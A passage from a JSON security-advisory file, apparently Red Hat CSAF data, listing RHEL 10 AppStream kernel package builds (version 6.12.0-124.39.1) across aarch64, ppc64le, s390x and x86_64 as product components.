"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
